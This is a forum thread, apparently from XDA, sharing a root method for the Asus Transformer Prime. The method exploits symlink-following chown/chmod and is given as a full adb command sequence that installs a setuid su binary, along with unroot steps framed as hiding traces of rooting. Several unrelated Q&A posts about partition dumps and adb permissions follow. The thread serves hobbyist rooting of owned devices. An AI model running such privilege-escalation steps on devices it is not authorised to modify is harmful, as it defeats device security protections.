I have your ICS root ready, how about we call it TPSparkyRoot. I based my research on code written by Dan Rosenberg (similar to what jchase did with NachoRoot in the fact that chown/chmod follows symlinks even when set during startup), here is a link to that research http://vulnfactory.org/blog/2011/08/25/rooting-the-droid-3/
**UPDATE**
Android's source has been patched so that future OEMs can not leave this hole open by accident.
https://android-review.googlesource.com/#/c/36035/
**UPDATE**
This method has been shown to work on the HTC One X see forum
http://forum.xda-developers.com/showthread.php?t=1644167
Theoretically this should work on Honeycomb versions of the Prime as well, since the Honeycomb update is where I found the flaw that is being exploited. I have confirmed this works on my Prime.
**UPDATE**
This exploit does not currently work for the latest ICS update released (v9.4.2.11 on 1/18/2012). You can use OTA Rootkeeper to backup your root prior to updating using OTA, which I have confirmed to work on my device, (this may not work if you push the update manually).
https://market.android.com/details?id=org.projectvoodoo.otarootkeeper
For the devs out there, it does not to honor the ro.kernel.qemu=1 setting within the local.prop because it is already set to blank by that point by the build.prop
You must have your Prime set up to use adb and your adb location contained in your path variable (windows) or unzip the files from my zip into that directory before running.
**UPDATED**
If you are have issues getting adb working, make sure asus sync is not running, if it is then kill it.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
adb shell id
//IF ID IS 0/root THEN CONTINUE, ELSE START OVER>
adb remount
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
//UNDO EVERYTHING EXCEPT su
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
**UPDATE** As jchase stated "If your device "bootloops" don't stress, just follow through with the commands as it "loops" ro.kernel.qemu can do funky stuff." I did notice this in my rooting but just assumed it was normal as this is my first use of adb.
**UPDATE2**
If you get a permissions error on the call
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
then you may try
adb shell rm /data/local.prop
And then try the echo command again. This may be due to having rooted prior without cleaning up properly. Thanks to Franky_402 for this piece of info.
I have updated the batch file to include this step, it should still be fine for those who are not having the issue as well.
I have attached a zip file containing the su and a bat file for a more automated process (just pauses when during reboots, don’t hit go until it’s done rebooting). Or, you can run the commands manually and get the su file from the origin http://downloads.androidsu.com/superuser/su-bin-3.0.3.2-efghi-signed.zip
Finally, install Superuser to make it all work https://market.android.com/details?id=com.noshufou.android.su
**UPDATE** UNROOT
There are multiple was to unroot now that you have root access already (all you need to do is remove the su file; so you could potential skip all the steps before the remount and just add the local.prop manually using a file manager and then reboot).
The one most similar way to how you rooted would be to follow all of the steps above, but replace these 3 lines
adb push su /system/xbin/su
adb shell chown 0.0 /system/xbin/su
adb shell chmod 06755 /system/xbin/su
with this line
adb shell rm /system/xbin/su
This will remove the actual root, but it would leave behind any apps that you have given root access to or any files that those apps changed themselves (i.e. RootKeeper backs up the su file and the backup would need to be removed). If you had anything like this you would need to clean up that first before unrooting because it is a dead giveaway that it was rooted.
Viperboy should be releasing his tool shortly that utilizes this method, if you would like a one click process that installs apps along with it (superuser, busybox). I’m guessing it installed them to the root apps directory so these also would need to be removed when unrooting as well (i.e. if you root using his new tool you should unroot using it as well).
**UPDATED** Remove PayPal link in favor of link over there <-
Yes, as it says, I went from the same base exploit that was shown by Dan and was the base for jchase as well.
The commands more than likely are but the exploit must be different or Jcases rot would still be working... Thanks OP!!!
EDIT: He didn't "ask" for donations just gave a link since he doesn't have the donate button <<over there
Not mine at all, props to this guy! Send him some bones.
Yes, thanks, I did not realize that there was a donate button as I am still learning this forum.
This root is confirmed!
If your device "bootloops" don't stress, just follow through with the commands as it "loops" ro.kernel.qemu can do funky stuff.
Good ****.
sparkym3 said:
Yes, thanks, I did not realize that there was a donate button as I am still learning this forum.
Click to expand...
Click to collapse
Yeah it's in the User Control Panel on the top of the forum
"Reported" your thread to a mod, so he can move it to the dev section
And welcome to XDA Don't let the trolls take your love for android
jcase said:
This root is confirmed!
If your device "bootloops" don't stress, just follow through with the commands as it "loops" ro.kernel.qemu can do funky stuff.
Good ****.
Click to expand...
Click to collapse
OP, maybe put that in the OP, so users don't panic
Moved to development.
Holly smoke, it works....
jcase said:
Not mine at all, props to this guy! Send him some bones.
Click to expand...
Click to collapse
As the main man says. Give credit when due. It's not his. and give the guy props and if you wish to donate donate.
This is why this android community is crap. because everyone trolls. If it was jcases he'd release it. not someone else. and im sure as hell he wouldnt be saying these things 'like give the guy some bones'
rhcp0112345 said:
As the main man says. Give credit when due. It's not his. and give the guy props and if you wish to donate donate.
This is why this android community is crap. because everyone trolls. If it was jcases he'd release it. not someone else. and im sure as hell he wouldnt be saying these things 'like give the guy some bones'
Click to expand...
Click to collapse
Biggem isnt really a troll, he's obv just got out of the wrong side of the bed ... i'm sure he'll take that back.
Danny-B- said:
Biggem isnt really a troll, he's obv just got out of the wrong side of the bed ... i'm sure he'll take that back.
Click to expand...
Click to collapse
Also nothing wrong with asking for donations.
YOU ROCK. donations to you and jcase after payday
You would all post this WHILE I'm at work, have my prime with me, but not my charger! lol. I'll DEFINITELY check it out when I get home.
disturb3d1 said:
You would all post this WHILE I'm at work, have my prime with me, but not my charger! lol. I'll DEFINITELY check it out when I get home.
Click to expand...
Click to collapse
Dude mine should be here in 9 hrs
I might do an unboxing vid using my photon
Wait a minute, chainfire is paying attention to the thread, that only means good things. Please tell me your gonna dev some for this device
Sent from my SGH-T959 using XDA App
not going good for me I'm on ubuntu with working adb. copied su to home directory and running all commands from there. when i get to, adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop", i get, /system/bin/sh: cannot create /data/local.prop: Permission denied. So i never get the right id to continue. Anyways please help. thankx
Any chance in the future this can be converted to an apk to install on Prime or a One-click method, per se?
I'm trying to uninstall packages with the following command:
Code:
adb
shell
su
pm uninstall tunein.player
But it just reports failure. No explanation why!
I tried the following command beforehand:
Code:
adb
shell
su
pm disable tunein.player
Which works fine, but doesn't make the first command work any better.
Any ideas what the problem is? Obviously, I'm rooted.
Any help is appreciated!
Thanks,
Billy
Please use the Q&A Forum for questions &
Read the Forum Rules Ref Posting
Moving to Q&A
My apologies. I should have realized.
Thanks,
Billy
Is it a system app since Android doesn't allow you to uninstall system apps just disable them.
shadowofdarkness said:
Is it a system app since Android doesn't allow you to uninstall system apps just disable them.
Click to expand...
Click to collapse
That could be it. It's AT&T Bloatware that i'm trying to uninstall. That's probably considered "system".
Thanks a bunch for the reply!
Billy
Hello
I have a samsung galaxy s5 SM-G900W8 ( marshmallow )
and am puzzled as to why
mount /dev/block/mmcblk0p15 tmp_mnt
is giving me a 'Invalid argument'
where tmp_mnt is a directory that I have made
and we have in /dev/block/platform/msm_sdcc.1/by-name:
boot -> /dev/block/mmcblk0p15
I wish to see if something like boot.img is in there
Bruce
brucembeach said:
Hello, I have a samsung galaxy s5 SM-G900W8.....
Click to expand...
Click to collapse
I don't have this variant but, your best bet is to post this question within the following Q&A thread that's specific to your device and variants.
https://forum.xda-developers.com/showthread.php?t=2700073
Good Luck!
~~~~~~~~~~~~~~~
I DO NOT provide support via PM unless asked/requested by myself. PLEASE keep it in the threads where everyone can share.
Thanks for the reply. I'm new to the forum and
wasn't sure where to put my query. In any case the
answer came to me shortly after my post, which I
believe is generic to all android devices, except
that things like /dev/block/mmcblk0p15 have to be
adjusted for the specific device.
The reason i was geting 'Invalid argument' from
the mount command is that there is no filesystem
on '/dev/block/mmcblk0p15' and hence it can't be
mounted. My guess is that at boot time the system
doesn't know anything about filesystems and knows
just enough to send raw low level commands to the
storage medium to read the boot file, dissassemble
it and pass control to it.
Here you need to be rooted. If you execute the
commands from:
** adb shell
dd if=/dev/block/mmcblk0p15 of=/storage/C37F-1BE2/test_boot.img
** and some host
adb pull /storage/C37F-1BE2/test_boot.img
you will have just downloaded a backup of the boot
image for your android, and the same applies for
the recovery. With suitable tools the
test_boot.img breaks down to a kernel and a
ramdisk.cpio.gz and the ramdisk.cpio.gz can be
decompressed to the ramdisk
bruce
Hello, I am a newbie working with Android Studio so thank you in advanced for your patience. I am attempted to restore a backup file from an LG device onto an emulator device. In the process I am facing an issue I can't identify. To start the emulator I continue getting a permissions denied msg.
If I run the command "sudo chown ubuntu /dev/kvm" the permissions issue is corrected. It then happens again later and I can't figure out why? Are the permissions resetting for some reason?
richey75 said:
Hello, I am a newbie working with Android Studio.......
Click to expand...
Click to collapse
I haven't used this in quite some time but, you may find the following threads helpful for what you are looking for. Don't be afraid to ask for some member guidance within one of them too.
https://forum.xda-developers.com/showthread.php?t=1599005
https://forum.xda-developers.com/showthread.php?t=3698584
Good Luck!
~~~~~~~~~~~~~~~
I DO NOT provide support via PM unless asked/requested by myself. PLEASE keep it in the threads where everyone can share.
Hi there,
Adb is installed on the external disk and the device was rooted.
When I ran
Code:
adb pull /dev/block/mmcblk0p43 43.img
it returned
Code:
adb: error: remote object '/dev/block/mmcblk0p43' does not exist
mmcblk0p43 is the userdata partition of the device.
However,
Code:
adb shell "su -c cat /dev/block/mmcblk0p43" > 43.img
managed to pull mmcblk0p43 into the external disk.
Why did adb pull /dev/block/mmcblk0p43 43.img fail to pull userdata partition?
Thanks in advance.
we are running in circles...
adb pull /dev/block/... requires 'adb root'
aIecxs said:
@wenyendev the answer applies to all your following questions:
adbd cannot run as root in production builds. you have three options. 1) use adb root in TWRP recovery mode. 2) use insecure adbd daemon 3) use adb shell su shell instead. that's it.
Click to expand...
Click to collapse
aIecxs said:
we are running in circles...
adb pull /dev/block/... requires 'adb root'
Click to expand...
Click to collapse
Thanks for your reply.
But how could you expect me to know in advance that adb pull command requires adb root?
Because you already did...
We expect you can remember your previously working commands (you have written in post #1
in the quoted thread just to name example):
wenyendev said:
In addition
adb pull /dev/block/mmcblk0p43 43.img
It returned
adb: error: remote object '/dev/block/mmcblk0p43' does not exist
[...]
adb pull /dev/block/mmcblk0p43 43.img worked.
Click to expand...
Click to collapse
So how it comes that you're asking about exact same command just 7 days later again?
I have asked you to read old thread(s) for good reason.
aIecxs said:
please stop posting multiple threads.
please start reading answers in old threads.
Click to expand...
Click to collapse
While it may true, by opening new threads you may get more attention, please understand that threads on XDA are problem-focused, not question-based. This is not a Q&A site where each single minor issue belongs to new question (and even on Q&A sites they would just close your repeating questions as duplicates).
This is a forum where you should keep your problem in one single thread, avoid spreading pieces of information over multiple threads.
your issue is to recover deleted files from unencrypted rooted device. do not open new thread for every little step, ask your questions in the same thread that belongs to the (real) problem.
You will benefit when you're focused to keep every information in one thread. Other people trying to help will read the history of what has already been asked, and can offer better help.
kindly read this post
*** read before you post ***
I am not to be embroiled myself in heated arguments here.
Thanks again for your answer.